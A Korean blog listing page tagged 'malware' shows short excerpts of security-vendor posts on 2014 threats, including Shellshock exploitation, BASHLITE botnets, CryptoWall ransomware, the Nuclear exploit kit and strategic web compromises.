malware 썸네일형 리스트형 Democracy in Hong Kong Under Attack Over the last few months, Volexity has been tracking a particularly remarkable advanced persistent threat (APT) operation involving strategic web compromises of websites in Hong Kong and Japan. In both countries, the compromised websites have been particularly notable for their relevance to current events and the high profile nature of the organizations involved. In particular the Hong Kong comp.. 더보기 Rustock.B Live Debugging - SwishDbgExt, SysecLabs script. Here we are, part two! I thought rather than doing a live debugging of runtime2 as I discussed inmy last rootkit debugging post, I'd debug a different rootkit. I chose Rustock.B (PE386) as it's a pretty notorious rootkit, and in my opinion is a lot of fun to debug. It's always a great learning experience to debug, reverse, and research things for yourself as well. I have a map of rootkits I want.. 더보기 Evolution of the Nuclear Exploit Kit Exploit kits remain an efficient mechanism for cyber criminals to distribute malware. Such kits include exploits for multiple vulnerabilities within a single malicious webpage. Criminals can check operating systems, web browsers and browser plugins for anything that is not fully patched and launch an exploit specific to the out of date software. Using this technique criminals can maximise their .. 더보기 Aided Frame, Aided Direction (Because it’s a redirect) On September 24 2014, FireEye observed a new strategic web compromise (SWC) campaign that we believe is targeting non-profit organizations and non-governmental organizations (NGO) by hosting iframes on legitimate websites. The compromised websites contained an iframe to direct site visitors to a threat actor-controlled IP address that dropped a Poison Ivy remote access tool (RAT) onto victims’ s.. 더보기 Shellshock in the Wild The exploitation of the BASH bug, now widely referred to as “Shellshock”, is in full swing. Attackers have mobilized—multiple proof-of-concept scripts are available, including a Metasploit module, making this vulnerability very accessible. The ease of exploitation, the simplicity of the vulnerability, and the extremely widespread install base of BASH, make this bug so deadly—and shows why enterp.. 더보기 The Shellshock Aftershock for NAS Administrators FireEye has been monitoring Shellshock-related attacks closely since the vulnerability was first made public last week. Specifically, FireEye has observed attackers attempting to exploit the BASH remote code injection vulnerability against Network Attached Storage systems (NAS). These attacks result in the hackers having a root level remote shell, gaining full access to the contents of the NAS. .. 더보기 CryptoWall updated to 2.0 One of this summer's most followed ransomware families is CryptoWall. Over time CryptoWall has seen minor updates and changes but its core functionality has stayed pretty much the same. Once a machine has been infected, CryptoWall will attempt to encrypt the contents of the victims hard drive and then demand a ransom payment in exchange for the decryption key required to get the contents back. T.. 더보기 Shellshock '을 악용 한 공격을 다시 확인 IRC 봇을 이용 Linux 등에서 사용되는 오픈 소스 프로그램 "Bourne Again shell (bash) '에 취약점" Shellshock "의 중요성을 감안할 때,이 취약점을 이용한 공격을 더 확인하고도 불가사의는 없습니다. "Shellshock"에 관한보고가 있은 지 몇 시간 후,이 취약점을 이용하여 시스템에 침입하는 악성 프로그램 " ELF_BASHLITE.A"가 확인되었습니다. 또한 " PERL_SHELLBOT.WZ」나 「ELF_BASHLET.A "등 기타 악성 프로그램도 확인되고 있습니다. 이들은 여러 명령을 실행하는 기능을 갖추고 있으며,이를 통해 PC 나 서버를 차지할 것입니다.이러한 악성 프로그램 공격뿐만 아니라 몇 가지 유명한 기관에 대한 ' 분산 서비스 거부 (DDoS) 공격 '이보고되었습니다. .. 더보기 bash에 존재하는 취약점 "Shellshock"를 이용한 봇넷 공격 확인 Linux 등에서 사용되는 오픈 소스 프로그램 "Bourne Again shell (bash) '에 취약점"Shellshock」에 의해 예상되는 피해의 하나는 사이버 범죄자와 공격자가이 취약점을 이용하여 기업 또는 대규모 조직에 대해 "분산 서비스 거부 (DDoS) 공격"을 시작하는 것입니다. 이것은 이미 현실이되어 실제 "Shellshock"취약점을 안고 서버를 보유한 일부 기관에서 봇넷을 이용한 공격이 있었다는 보고 가 나와 있습니다. 봇넷 감염 PC 및 시스템에 형성되는 네트워크입니다.트렌드 마이크로의 분석에 따르면, " ELF_BASHWOOP.A "로 감지되는이 백도어 악성 프로그램은 다음 명령을 실행합니다.killudpsyntcpampJdildoshttpmineloris또한이 악성 프로그램은 명.. 더보기 Shellshock Updates: BASHLITE C&Cs Seen, Shellshock Exploit Attempts in Brazil We have another update regarding Shellshock vulnerability. In a previous blog entry, we mentioned about a DDoS attack against institutions, which depicted the gravity of the vulnerability’s real world impact.Based on our analysis, the backdoor that was used in this DDoS attack is somewhat related to the previous Shellshock exploits we have seen so far. It appears that the various payloads (PERL_.. 더보기 이전 1 ··· 44 45 46 47 48 49 50 ··· 57 다음